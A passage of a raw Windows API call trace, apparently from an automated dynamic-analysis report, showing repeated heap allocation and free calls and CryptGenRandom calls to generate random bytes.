1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8200 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8310 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead18 | out: hHeap=0x2b0000) returned 1 [0032.720] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.721] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.721] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.721] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.722] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.722] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.722] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.722] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.722] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.722] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.723] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.723] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.724] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.724] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.724] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.724] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.725] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.725] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.725] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.726] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.726] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.726] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.727] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.727] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.727] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.727] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.727] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.786] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.787] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.787] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.787] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.787] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.787] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.788] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.788] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.788] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.788] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.789] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.789] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.789] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.790] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.790] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.790] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.791] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.791] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0032.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0032.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0032.791] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2eac90) returned 1 [0032.792] CryptGenRandom (in: hProv=0x2eac90, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0032.792] CryptReleaseContext (hProv=0x2eac90, dwFlags=0x0) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eac08 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eaf38 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2e80f0 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf38 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8208 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9eb0 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e8318 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.794] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae28 | out: hHeap=0x2b0000) returned 1 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8318 | out: hHeap=0x2b0000) returned 1 [0032.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0032.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 